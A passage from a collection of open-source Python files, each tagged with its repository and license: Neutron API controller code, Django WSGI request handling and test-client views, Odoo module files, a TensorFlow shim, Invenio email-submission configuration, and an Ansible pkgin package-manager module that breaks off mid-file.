fields_to_strip = self._exclude_attributes_by_policy(
request.context, objs[0])
return notify({self._collection: [self._filter_attributes(
request.context, obj, fields_to_strip=fields_to_strip)
for obj in objs]})
else:
obj_creator = getattr(self._plugin, action)
if self._collection in body:
# Emulate atomic bulk behavior
objs = self._emulate_bulk_create(obj_creator, request,
body, parent_id)
return notify({self._collection: objs})
else:
kwargs.update({self._resource: body})
obj = obj_creator(request.context, **kwargs)
self._send_nova_notification(action, {},
{self._resource: obj})
return notify({self._resource: self._view(request.context,
obj)})
def delete(self, request, id, **kwargs):
"""Deletes the specified entity."""
self._notifier.info(request.context,
self._resource + '.delete.start',
{self._resource + '_id': id})
action = self._plugin_handlers[self.DELETE]
# Check authz
policy.init()
parent_id = kwargs.get(self._parent_id_name)
obj = self._item(request, id, parent_id=parent_id)
try:
policy.enforce(request.context,
action,
obj)
except exceptions.PolicyNotAuthorized:
# To avoid giving away information, pretend that it
# doesn't exist
msg = _('The resource could not be found.')
raise webob.exc.HTTPNotFound(msg)
obj_deleter = getattr(self._plugin, action)
obj_deleter(request.context, id, **kwargs)
notifier_method = self._resource + '.delete.end'
self._notifier.info(request.context,
notifier_method,
{self._resource + '_id': id})
result = {self._resource: self._view(request.context, obj)}
self._send_nova_notification(action, {}, result)
self._send_dhcp_notification(request.context,
result,
notifier_method)
def update(self, request, id, body=None, **kwargs):
"""Updates the specified entity's attributes."""
parent_id = kwargs.get(self._parent_id_name)
try:
payload = body.copy()
except AttributeError:
msg = _("Invalid format: %s") % request.body
raise exceptions.BadRequest(resource='body', msg=msg)
payload['id'] = id
self._notifier.info(request.context,
self._resource + '.update.start',
payload)
body = Controller.prepare_request_body(request.context, body, False,
self._resource, self._attr_info,
allow_bulk=self._allow_bulk)
action = self._plugin_handlers[self.UPDATE]
# Load object to check authz
# but pass only attributes in the original body and required
# by the policy engine to the policy 'brain'
field_list = [name for (name, value) in self._attr_info.iteritems()
if (value.get('required_by_policy') or
value.get('primary_key') or
'default' not in value)]
# Ensure policy engine is initialized
policy.init()
orig_obj = self._item(request, id, field_list=field_list,
parent_id=parent_id)
orig_object_copy = copy.copy(orig_obj)
orig_obj.update(body[self._resource])
try:
policy.enforce(request.context,
action,
orig_obj)
except exceptions.PolicyNotAuthorized:
# To avoid giving away information, pretend that it
# doesn't exist
msg = _('The resource could not be found.')
raise webob.exc.HTTPNotFound(msg)
obj_updater = getattr(self._plugin, action)
kwargs = {self._resource: body}
if parent_id:
kwargs[self._parent_id_name] = parent_id
obj = obj_updater(request.context, id, **kwargs)
result = {self._resource: self._view(request.context, obj)}
notifier_method = self._resource + '.update.end'
self._notifier.info(request.context, notifier_method, result)
self._send_dhcp_notification(request.context,
result,
notifier_method)
self._send_nova_notification(action, orig_object_copy, result)
return result
@staticmethod
def _populate_tenant_id(context, res_dict, is_create):
if (('tenant_id' in res_dict and
res_dict['tenant_id'] != context.tenant_id and
not context.is_admin)):
msg = _("Specifying 'tenant_id' other than authenticated "
"tenant in request requires admin privileges")
raise webob.exc.HTTPBadRequest(msg)
if is_create and 'tenant_id' not in res_dict:
if context.tenant_id:
res_dict['tenant_id'] = context.tenant_id
else:
msg = _("Running without keystone AuthN requires "
" that tenant_id is specified")
raise webob.exc.HTTPBadRequest(msg)
@staticmethod
def prepare_request_body(context, body, is_create, resource, attr_info,
allow_bulk=False):
"""Verifies required attributes are in request body.
Also checking that an attribute is only specified if it is allowed
for the given operation (create/update).
Attribute with default values are considered to be optional.
body argument must be the deserialized body.
"""
collection = resource + "s"
if not body:
raise webob.exc.HTTPBadRequest(_("Resource body required"))
LOG.debug(_("Request body: %(body)s"), {'body': body})
prep_req_body = lambda x: Controller.prepare_request_body(
context,
x if resource in x else {resource: x},
is_create,
resource,
attr_info,
allow_bulk)
if collection in body:
if not allow_bulk:
raise webob.exc.HTTPBadRequest(_("Bulk operation "
"not supported"))
bulk_body = [prep_req_body(item) for item in body[collection]]
if not bulk_body:
raise webob.exc.HTTPBadRequest(_("Resources required"))
return {collection: bulk_body}
res_dict = body.get(resource)
if res_dict is None:
msg = _("Unable to find '%s' in request body") % resource
raise webob.exc.HTTPBadRequest(msg)
Controller._populate_tenant_id(context, res_dict, is_create)
Controller._verify_attributes(res_dict, attr_info)
if is_create: # POST
for attr, attr_vals in attr_info.iteritems():
if attr_vals['allow_post']:
if ('default' not in attr_vals and
attr not in res_dict):
msg = _("Failed to parse request. Required "
"attribute '%s' not specified") % attr
raise webob.exc.HTTPBadRequest(msg)
res_dict[attr] = res_dict.get(attr,
attr_vals.get('default'))
else:
if attr in res_dict:
msg = _("Attribute '%s' not allowed in POST") % attr
raise webob.exc.HTTPBadRequest(msg)
else: # PUT
for attr, attr_vals in attr_info.iteritems():
if attr in res_dict and not attr_vals['allow_put']:
msg = _("Cannot update read-only attribute %s") % attr
raise webob.exc.HTTPBadRequest(msg)
for attr, attr_vals in attr_info.iteritems():
if (attr not in res_dict or
res_dict[attr] is attributes.ATTR_NOT_SPECIFIED):
continue
# Convert values if necessary
if 'convert_to' in attr_vals:
res_dict[attr] = attr_vals['convert_to'](res_dict[attr])
# Check that configured values are correct
if 'validate' not in attr_vals:
continue
for rule in attr_vals['validate']:
res = attributes.validators[rule](res_dict[attr],
attr_vals['validate'][rule])
if res:
msg_dict = dict(attr=attr, reason=res)
msg = _("Invalid input for %(attr)s. "
"Reason: %(reason)s.") % msg_dict
raise webob.exc.HTTPBadRequest(msg)
return body
@staticmethod
def _verify_attributes(res_dict, attr_info):
extra_keys = set(res_dict.keys()) - set(attr_info.keys())
if extra_keys:
msg = _("Unrecognized attribute(s) '%s'") % ', '.join(extra_keys)
raise webob.exc.HTTPBadRequest(msg)
def _validate_network_tenant_ownership(self, request, resource_item):
# TODO(salvatore-orlando): consider whether this check can be folded
# in the policy engine
if (request.context.is_admin or
self._resource not in ('port', 'subnet')):
return
network = self._plugin.get_network(
request.context,
resource_item['network_id'])
# do not perform the check on shared networks
if network.get('shared'):
return
network_owner = network['tenant_id']
if network_owner != resource_item['tenant_id']:
msg = _("Tenant %(tenant_id)s not allowed to "
"create %(resource)s on this network")
raise webob.exc.HTTPForbidden(msg % {
"tenant_id": resource_item['tenant_id'],
"resource": self._resource,
})
def create_resource(collection, resource, plugin, params, allow_bulk=False,
member_actions=None, parent=None, allow_pagination=False,
allow_sorting=False):
controller = Controller(plugin, collection, resource, params, allow_bulk,
member_actions=member_actions, parent=parent,
allow_pagination=allow_pagination,
allow_sorting=allow_sorting)
return wsgi_resource.Resource(controller, FAULT_MAP)
| apache-2.0 |
ProfessionalIT/professionalit-webiste | sdk/google_appengine/lib/django-0.96/django/core/handlers/wsgi.py | 32 | 7022 | from django.core.handlers.base import BaseHandler
from django.core import signals
from django.dispatch import dispatcher
from django.utils import datastructures
from django import http
from pprint import pformat
from shutil import copyfileobj
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# See http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
STATUS_CODE_TEXT = {
100: 'CONTINUE',
101: 'SWITCHING PROTOCOLS',
200: 'OK',
201: 'CREATED',
202: 'ACCEPTED',
203: 'NON-AUTHORITATIVE INFORMATION',
204: 'NO CONTENT',
205: 'RESET CONTENT',
206: 'PARTIAL CONTENT',
300: 'MULTIPLE CHOICES',
301: 'MOVED PERMANENTLY',
302: 'FOUND',
303: 'SEE OTHER',
304: 'NOT MODIFIED',
305: 'USE PROXY',
306: 'RESERVED',
307: 'TEMPORARY REDIRECT',
400: 'BAD REQUEST',
401: 'UNAUTHORIZED',
402: 'PAYMENT REQUIRED',
403: 'FORBIDDEN',
404: 'NOT FOUND',
405: 'METHOD NOT ALLOWED',
406: 'NOT ACCEPTABLE',
407: 'PROXY AUTHENTICATION REQUIRED',
408: 'REQUEST TIMEOUT',
409: 'CONFLICT',
410: 'GONE',
411: 'LENGTH REQUIRED',
412: 'PRECONDITION FAILED',
413: 'REQUEST ENTITY TOO LARGE',
414: 'REQUEST-URI TOO LONG',
415: 'UNSUPPORTED MEDIA TYPE',
416: 'REQUESTED RANGE NOT SATISFIABLE',
417: 'EXPECTATION FAILED',
500: 'INTERNAL SERVER ERROR',
501: 'NOT IMPLEMENTED',
502: 'BAD GATEWAY',
503: 'SERVICE UNAVAILABLE',
504: 'GATEWAY TIMEOUT',
505: 'HTTP VERSION NOT SUPPORTED',
}
def safe_copyfileobj(fsrc, fdst, length=16*1024, size=0):
"""
A version of shutil.copyfileobj that will not read more than 'size' bytes.
This makes it safe from clients sending more than CONTENT_LENGTH bytes of
data in the body.
"""
if not size:
return
while size > 0:
buf = fsrc.read(min(length, size))
if not buf:
break
fdst.write(buf)
size -= len(buf)
class WSGIRequest(http.HttpRequest):
def __init__(self, environ):
self.environ = environ
self.path = environ['PATH_INFO']
self.META = environ
self.method = environ['REQUEST_METHOD'].upper()
def __repr__(self):
# Since this is called as part of error handling, we need to be very
# robust against potentially malformed input.
try:
get = pformat(self.GET)
except:
get = '<could not parse>'
try:
post = pformat(self.POST)
except:
post = '<could not parse>'
try:
cookies = pformat(self.COOKIES)
except:
cookies = '<could not parse>'
try:
meta = pformat(self.META)
except:
meta = '<could not parse>'
return '<WSGIRequest\nGET:%s,\nPOST:%s,\nCOOKIES:%s,\nMETA:%s>' % \
(get, post, cookies, meta)
def get_full_path(self):
return '%s%s' % (self.path, self.environ.get('QUERY_STRING', '') and ('?' + self.environ.get('QUERY_STRING', '')) or '')
def is_secure(self):
return self.environ.has_key('HTTPS') and self.environ['HTTPS'] == 'on'
def _load_post_and_files(self):
# Populates self._post and self._files
if self.method == 'POST':
if self.environ.get('CONTENT_TYPE', '').startswith('multipart'):
header_dict = dict([(k, v) for k, v in self.environ.items() if k.startswith('HTTP_')])
header_dict['Content-Type'] = self.environ.get('CONTENT_TYPE', '')
self._post, self._files = http.parse_file_upload(header_dict, self.raw_post_data)
else:
self._post, self._files = http.QueryDict(self.raw_post_data), datastructures.MultiValueDict()
else:
self._post, self._files = http.QueryDict(''), datastructures.MultiValueDict()
def _get_request(self):
if not hasattr(self, '_request'):
self._request = datastructures.MergeDict(self.POST, self.GET)
return self._request
def _get_get(self):
if not hasattr(self, '_get'):
# The WSGI spec says 'QUERY_STRING' may be absent.
self._get = http.QueryDict(self.environ.get('QUERY_STRING', ''))
return self._get
def _set_get(self, get):
self._get = get
def _get_post(self):
if not hasattr(self, '_post'):
self._load_post_and_files()
return self._post
def _set_post(self, post):
self._post = post
def _get_cookies(self):
if not hasattr(self, '_cookies'):
self._cookies = http.parse_cookie(self.environ.get('HTTP_COOKIE', ''))
return self._cookies
def _set_cookies(self, cookies):
self._cookies = cookies
def _get_files(self):
if not hasattr(self, '_files'):
self._load_post_and_files()
return self._files
def _get_raw_post_data(self):
try:
return self._raw_post_data
except AttributeError:
buf = StringIO()
try:
# CONTENT_LENGTH might be absent if POST doesn't have content at all (lighttpd)
content_length = int(self.environ.get('CONTENT_LENGTH', 0))
except ValueError: # if CONTENT_LENGTH was empty string or not an integer
content_length = 0
safe_copyfileobj(self.environ['wsgi.input'], buf, size=content_length)
self._raw_post_data = buf.getvalue()
buf.close()
return self._raw_post_data
GET = property(_get_get, _set_get)
POST = property(_get_post, _set_post)
COOKIES = property(_get_cookies, _set_cookies)
FILES = property(_get_files)
REQUEST = property(_get_request)
raw_post_data = property(_get_raw_post_data)
class WSGIHandler(BaseHandler):
def __call__(self, environ, start_response):
from django.conf import settings
# Set up middleware if needed. We couldn't do this earlier, because
# settings weren't available.
if self._request_middleware is None:
self.load_middleware()
dispatcher.send(signal=signals.request_started)
try:
request = WSGIRequest(environ)
response = self.get_response(request)
# Apply response middleware
for middleware_method in self._response_middleware:
response = middleware_method(request, response)
finally:
dispatcher.send(signal=signals.request_finished)
try:
status_text = STATUS_CODE_TEXT[response.status_code]
except KeyError:
status_text = 'UNKNOWN STATUS CODE'
status = '%s %s' % (response.status_code, status_text)
response_headers = response.headers.items()
for c in response.cookies.values():
response_headers.append(('Set-Cookie', c.output(header='')))
start_response(status, response_headers)
return response
| lgpl-3.0 |
kalahbrown/HueBigSQL | desktop/core/ext-py/Django-1.6.10/tests/test_client/views.py | 51 | 9661 | from xml.dom.minidom import parseString
from django.contrib.auth.decorators import login_required, permission_required
from django.core import mail
from django.forms import fields
from django.forms.forms import Form, ValidationError
from django.forms.formsets import formset_factory, BaseFormSet
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound
from django.shortcuts import render_to_response
from django.template import Context, Template
from django.utils.decorators import method_decorator
from django.utils.six.moves.urllib.parse import urlencode
def get_view(request):
"A simple view that expects a GET request, and returns a rendered template"
t = Template('This is a test. {{ var }} is the value.', name='GET Template')
c = Context({'var': request.GET.get('var', 42)})
return HttpResponse(t.render(c))
def post_view(request):
"""A view that expects a POST, and returns a different template depending
on whether any POST data is available
"""
if request.method == 'POST':
if request.POST:
t = Template('Data received: {{ data }} is the value.', name='POST Template')
c = Context({'data': request.POST['value']})
else:
t = Template('Viewing POST page.', name='Empty POST Template')
c = Context()
else:
t = Template('Viewing GET page.', name='Empty GET Template')
c = Context()
return HttpResponse(t.render(c))
def view_with_header(request):
"A view that has a custom header"
response = HttpResponse()
response['X-DJANGO-TEST'] = 'Slartibartfast'
return response
def raw_post_view(request):
"""A view which expects raw XML to be posted and returns content extracted
from the XML"""
if request.method == 'POST':
root = parseString(request.body)
first_book = root.firstChild.firstChild
title, author = [n.firstChild.nodeValue for n in first_book.childNodes]
t = Template("{{ title }} - {{ author }}", name="Book template")
c = Context({"title": title, "author": author})
else:
t = Template("GET request.", name="Book GET template")
c = Context()
return HttpResponse(t.render(c))
def redirect_view(request):
"A view that redirects all requests to the GET view"
if request.GET:
query = '?' + urlencode(request.GET, True)
else:
query = ''
return HttpResponseRedirect('/test_client/get_view/' + query)
def view_with_secure(request):
"A view that indicates if the request was secure"
response = HttpResponse()
response.test_was_secure_request = request.is_secure()
return response
def double_redirect_view(request):
"A view that redirects all requests to a redirection view"
return HttpResponseRedirect('/test_client/permanent_redirect_view/')
def bad_view(request):
"A view that returns a 404 with some error content"
return HttpResponseNotFound('Not found!. This page contains some MAGIC content')
TestChoices = (
('a', 'First Choice'),
('b', 'Second Choice'),
('c', 'Third Choice'),
('d', 'Fourth Choice'),
('e', 'Fifth Choice')
)
class TestForm(Form):
text = fields.CharField()
email = fields.EmailField()
value = fields.IntegerField()
single = fields.ChoiceField(choices=TestChoices)
multi = fields.MultipleChoiceField(choices=TestChoices)
def clean(self):
cleaned_data = self.cleaned_data
if cleaned_data.get("text") == "Raise non-field error":
raise ValidationError("Non-field error.")
return cleaned_data
def form_view(request):
"A view that tests a simple form"
if request.method == 'POST':
form = TestForm(request.POST)
if form.is_valid():
t = Template('Valid POST data.', name='Valid POST Template')
c = Context()
else:
t = Template('Invalid POST data. {{ form.errors }}', name='Invalid POST Template')
c = Context({'form': form})
else:
form = TestForm(request.GET)
t = Template('Viewing base form. {{ form }}.', name='Form GET Template')
c = Context({'form': form})
return HttpResponse(t.render(c))
def form_view_with_template(request):
"A view that tests a simple form"
if request.method == 'POST':
form = TestForm(request.POST)
if form.is_valid():
message = 'POST data OK'
else:
message = 'POST data has errors'
else:
form = TestForm()
message = 'GET form page'
return render_to_response('form_view.html',
{
'form': form,
'message': message
}
)
class BaseTestFormSet(BaseFormSet):
def clean(self):
"""Checks that no two email addresses are the same."""
if any(self.errors):
# Don't bother validating the formset unless each form is valid
return
emails = []
for i in range(0, self.total_form_count()):
form = self.forms[i]
email = form.cleaned_data['email']
if email in emails:
raise ValidationError(
"Forms in a set must have distinct email addresses."
)
emails.append(email)
TestFormSet = formset_factory(TestForm, BaseTestFormSet)
def formset_view(request):
"A view that tests a simple formset"
if request.method == 'POST':
formset = TestFormSet(request.POST)
if formset.is_valid():
t = Template('Valid POST data.', name='Valid POST Template')
c = Context()
else:
t = Template('Invalid POST data. {{ my_formset.errors }}',
name='Invalid POST Template')
c = Context({'my_formset': formset})
else:
formset = TestForm(request.GET)
t = Template('Viewing base formset. {{ my_formset }}.',
name='Formset GET Template')
c = Context({'my_formset': formset})
return HttpResponse(t.render(c))
def login_protected_view(request):
"A simple view that is login protected."
t = Template('This is a login protected test. Username is {{ user.username }}.', name='Login Template')
c = Context({'user': request.user})
return HttpResponse(t.render(c))
login_protected_view = login_required(login_protected_view)
def login_protected_view_changed_redirect(request):
"A simple view that is login protected with a custom redirect field set"
t = Template('This is a login protected test. Username is {{ user.username }}.', name='Login Template')
c = Context({'user': request.user})
return HttpResponse(t.render(c))
login_protected_view_changed_redirect = login_required(redirect_field_name="redirect_to")(login_protected_view_changed_redirect)
def _permission_protected_view(request):
"A simple view that is permission protected."
t = Template('This is a permission protected test. '
'Username is {{ user.username }}. '
'Permissions are {{ user.get_all_permissions }}.' ,
name='Permissions Template')
c = Context({'user': request.user})
return HttpResponse(t.render(c))
permission_protected_view = permission_required('permission_not_granted')(_permission_protected_view)
permission_protected_view_exception = permission_required('permission_not_granted', raise_exception=True)(_permission_protected_view)
class _ViewManager(object):
@method_decorator(login_required)
def login_protected_view(self, request):
t = Template('This is a login protected test using a method. '
'Username is {{ user.username }}.',
name='Login Method Template')
c = Context({'user': request.user})
return HttpResponse(t.render(c))
@method_decorator(permission_required('permission_not_granted'))
def permission_protected_view(self, request):
t = Template('This is a permission protected test using a method. '
'Username is {{ user.username }}. '
'Permissions are {{ user.get_all_permissions }}.' ,
name='Permissions Template')
c = Context({'user': request.user})
return HttpResponse(t.render(c))
_view_manager = _ViewManager()
login_protected_method_view = _view_manager.login_protected_view
permission_protected_method_view = _view_manager.permission_protected_view
def session_view(request):
"A view that modifies the session"
request.session['tobacconist'] = 'hovercraft'
t = Template('This is a view that modifies the session.',
name='Session Modifying View Template')
c = Context()
return HttpResponse(t.render(c))
def broken_view(request):
"""A view which just raises an exception, simulating a broken view."""
raise KeyError("Oops! Looks like you wrote some bad code.")
def mail_sending_view(request):
mail.EmailMessage(
"Test message",
"This is a test email",
"from@example.com",
['first@example.com', 'second@example.com']).send()
return HttpResponse("Mail sent")
def mass_mail_sending_view(request):
m1 = mail.EmailMessage(
'First Test message',
'This is the first test email',
'from@example.com',
['first@example.com', 'second@example.com'])
m2 = mail.EmailMessage(
'Second Test message',
'This is the second test email',
'from@example.com',
['second@example.com', 'third@example.com'])
c = mail.get_connection()
c.send_messages([m1,m2])
return HttpResponse("Mail sent")
| apache-2.0 |
rven/odoo | addons/fleet/__manifest__.py | 3 | 1513 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name' : 'Fleet',
'version' : '0.1',
'sequence': 185,
'category': 'Human Resources/Fleet',
'website' : 'https://www.odoo.com/page/fleet',
'summary' : 'Manage your fleet and track car costs',
'description' : """
Vehicle, leasing, insurances, cost
==================================
With this module, Odoo helps you managing all your vehicles, the
contracts associated to those vehicle as well as services, costs
and many other features necessary to the management of your fleet
of vehicle(s)
Main Features
-------------
* Add vehicles to your fleet
* Manage contracts for vehicles
* Reminder when a contract reach its expiration date
* Add services, odometer values for all vehicles
* Show all costs associated to a vehicle or to a type of service
* Analysis graph for costs
""",
'depends': [
'base',
'mail',
],
'data': [
'security/fleet_security.xml',
'security/ir.model.access.csv',
'views/fleet_vehicle_model_views.xml',
'views/fleet_vehicle_views.xml',
'views/fleet_vehicle_cost_views.xml',
'views/fleet_board_view.xml',
'views/mail_activity_views.xml',
'views/res_config_settings_views.xml',
'data/fleet_cars_data.xml',
'data/fleet_data.xml',
'data/mail_data.xml',
],
'demo': ['data/fleet_demo.xml'],
'installable': True,
'application': True,
}
| agpl-3.0 |
odoo-turkiye/odoo | addons/procurement_jit_stock/procurement_jit_stock.py | 44 | 1585 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2013 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
class procurement_order(osv.osv):
_inherit = "procurement.order"
def run(self, cr, uid, ids, context=None):
context = dict(context or {}, procurement_autorun_defer=True)
res = super(procurement_order, self).run(cr, uid, ids, context=context)
procurement_ids = self.search(cr, uid, [('move_dest_id.procurement_id', 'in', ids)], order='id', context=context)
if procurement_ids:
return self.run(cr, uid, procurement_ids, context=context)
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
gautam1858/tensorflow | tensorflow/python/estimator/canned/linear.py | 41 | 1278 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""linear python module.
Importing from tensorflow.python.estimator is unsupported
and will soon break!
"""
# pylint: disable=unused-import,g-bad-import-order,g-import-not-at-top,wildcard-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_estimator.python.estimator.canned import linear
# Include attrs that start with single underscore.
_HAS_DYNAMIC_ATTRIBUTES = True
linear.__all__ = [s for s in dir(linear) if not s.startswith('__')]
from tensorflow_estimator.python.estimator.canned.linear import *
| apache-2.0 |
fjorba/invenio | modules/elmsubmit/lib/elmsubmit_config.py | 35 | 4216 | ## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""ElmSubmit configuration parameters."""
__revision__ = "$Id$"
from invenio.config import CFG_SITE_ADMIN_EMAIL, \
CFG_SITE_URL, CFG_SITE_NAME
# elmsubmit configuration file:
CFG_ELMSUBMIT_FILES = {
'mailprefix': 'mail',
'test_case_1': 'elmsubmit_tests_1.mbox',
'test_case_2': 'elmsubmit_tests_2.mbox',
}
# Messages we need to send to the user, before we've identified the
# correct language to talk to them in (so we assume English!):
# pylint: disable=C0301
CFG_ELMSUBMIT_NOLANGMSGS = {'bad_email': 'Your email could not be parsed correctly to discover a submission. Please check your email client is functioning correctly.',
'bad_submission': 'The submission data that you have provided could not be parsed correctly. Please visit <%s> for a description of the correct format.' % CFG_SITE_URL,
'missing_type': 'The submission data that you have provided does not contain a TYPE field. This is mandatory for all submissions.',
'unsupported_type': 'The TYPE field of your submission does not contain a recognized value.',
'missing_fields_1': 'Your submission of type',
'missing_fields_2': 'does not contain all the required fields:',
'bad_field': 'This field does not validate correctly:',
'correct_format': 'It must be formatted as follows:',
'missing_attachment': 'We could not find the following file attached to your submission email:',
'temp_problem': 'There is a temporary problem with %s\'s email submission interface. Please retry your submission again shortly.' % CFG_SITE_NAME}
CFG_ELMSUBMIT_SERVERS = {'smtp': 'localhost'}
CFG_ELMSUBMIT_PEOPLE = {'admin': CFG_SITE_ADMIN_EMAIL}
# fields required in the submission mail
CFG_ELMSUBMIT_REQUIRED_FIELDS = ['title',
'author',
'date',
'files']
# defines the mapping of metadata fields to their marc codes
# mapping code as a list means the first element is mapped to the first element
# of the list, and the rest to the second
CFG_ELMSUBMIT_MARC_MAPPING = {'author': ['100__a', '700__a'],
'title': '245__a',
'subtitle': '245__b',
'photocaption': '246__b',
'subject': '65017a',
'secondary_subject': '65027a',
'email': '8560_f',
'files': ['FFT__a', 'FFT__a'],
'affiliation': ['100__u', '700__u'],
'language': '041__a',
'abstract': '520__a',
'keywords': '6531_a',
'OAIid': '909COo',
'PrimaryReportNumber': '037__a',
'AdditionalReportNumber': '088__a',
'series': ['490__a','490__v'],
'year': '260__a',
'note': '500__a',
#test tags used in test cases
'test1': '111__a',
'test2': '111__b',
'test3': '111__c',
'test4': '111__d',
'test5': '111__e'
}
# the list of the fields determines which subfields should be joined into a
# single datafield
CFG_ELMSUBMIT_MARC_FIELDS_JOINED = {'700__': [['a', 'u']],
'100__': [['a', 'u']],
#test tags
'111__': [['a','c'],['b','d']]
}
| gpl-2.0 |
cryptobanana/ansible | lib/ansible/modules/packaging/os/pkgin.py | 13 | 11257 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Shaun Zinck <shaun.zinck at gmail.com>
# Copyright (c) 2015 Lawrence Leonard Gilbert <larry@L2G.to>
# Copyright (c) 2016 Jasper Lievisse Adriaanse <j at jasper.la>
#
# Written by Shaun Zinck
# Based on pacman module written by Afterburn <http://github.com/afterburn>
# that was based on apt module written by Matthew Williams <matthew@flowroute.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: pkgin
short_description: Package manager for SmartOS, NetBSD, et al.
description:
- "The standard package manager for SmartOS, but also usable on NetBSD
or any OS that uses C(pkgsrc). (Home: U(http://pkgin.net/))"
version_added: "1.0"
author:
- "Larry Gilbert (L2G)"
- "Shaun Zinck (@szinck)"
- "Jasper Lievisse Adriaanse (@jasperla)"
notes:
- "Known bug with pkgin < 0.8.0: if a package is removed and another
package depends on it, the other package will be silently removed as
well. New to Ansible 1.9: check-mode support."
options:
name:
description:
- Name of package to install/remove;
- multiple names may be given, separated by commas
required: false
default: null
state:
description:
- Intended state of the package
choices: [ 'present', 'absent' ]
required: false
default: present
update_cache:
description:
- Update repository database. Can be run with other steps or on it's own.
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
upgrade:
description:
- Upgrade main packages to their newer versions
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
full_upgrade:
description:
- Upgrade all packages to their newer versions
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
clean:
description:
- Clean packages cache
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
force:
description:
- Force package reinstall
required: false
default: no
choices: [ "yes", "no" ]
version_added: "2.1"
'''
EXAMPLES = '''
# install package foo
- pkgin:
name: foo
state: present
# Update database and install "foo" package
- pkgin:
name: foo
update_cache: yes
# remove package foo
- pkgin:
name: foo
state: absent
# remove packages foo and bar
- pkgin:
name: foo,bar
state: absent
# Update repositories as a separate step
- pkgin:
update_cache: yes
# Upgrade main packages (equivalent to C(pkgin upgrade))
- pkgin:
upgrade: yes
# Upgrade all packages (equivalent to C(pkgin full-upgrade))
- pkgin:
full_upgrade: yes
# Force-upgrade all packages (equivalent to C(pkgin -F full-upgrade))
- pkgin:
full_upgrade: yes
force: yes
# clean packages cache (equivalent to C(pkgin clean))
- pkgin:
clean: yes
'''
import re
def query_package(module, name):
"""Search for the package by name.
Possible return values:
* "present" - installed, no upgrade needed
* "outdated" - installed, but can be upgraded
* False - not installed or not found
"""
# test whether '-p' (parsable) flag is supported.
rc, out, err = module.run_command("%s -p -v" % PKGIN_PATH)
if rc == 0:
pflag = '-p'
splitchar = ';'
else:
pflag = ''
splitchar = ' '
# Use "pkgin search" to find the package. The regular expression will
# only match on the complete name.
rc, out, err = module.run_command("%s %s search \"^%s$\"" % (PKGIN_PATH, pflag, name))
# rc will not be 0 unless the search was a success
if rc == 0:
# Search results may contain more than one line (e.g., 'emacs'), so iterate
# through each line to see if we have a match.
packages = out.split('\n')
for package in packages:
# Break up line at spaces. The first part will be the package with its
# version (e.g. 'gcc47-libs-4.7.2nb4'), and the second will be the state
# of the package:
# '' - not installed
# '<' - installed but out of date
# '=' - installed and up to date
# '>' - installed but newer than the repository version
pkgname_with_version, raw_state = package.split(splitchar)[0:2]
# Search for package, stripping version
# (results in sth like 'gcc47-libs' or 'emacs24-nox11')
pkg_search_obj = re.search(r'^(.*?)\-[0-9][0-9.]*(nb[0-9]+)*', pkgname_with_version, re.M)
# Do not proceed unless we have a match
if not pkg_search_obj:
continue
# Grab matched string
pkgname_without_version = pkg_search_obj.group(1)
if name != pkgname_without_version:
continue
# The package was found; now return its state
if raw_state == '<':
return 'outdated'
elif raw_state == '=' or raw_state == '>':
return 'present'
else:
return False
# no fall-through
# No packages were matched, so return False
return False
def format_action_message(module, action, count):
vars = {"actioned": action,
"count": count}
if module.check_mode:
message = "would have %(actioned)s %(count)d package" % vars
else:
message = "%(actioned)s %(count)d package" % vars
if count == 1:
return message
else:
return message + "s"
def format_pkgin_command(module, command, package=None):
# Not all commands take a package argument, so cover this up by passing
# an empty string. Some commands (e.g. 'update') will ignore extra
# arguments, however this behaviour cannot be relied on for others.
if package is None:
package = ""
if module.params["force"]:
force = "-F"
else:
force = ""
vars = {"pkgin": PKGIN_PATH,
"command": command,
"package": package,
"force": force}
if module.check_mode:
return "%(pkgin)s -n %(command)s %(package)s" % vars
else:
return "%(pkgin)s -y %(force)s %(command)s %(package)s" % vars
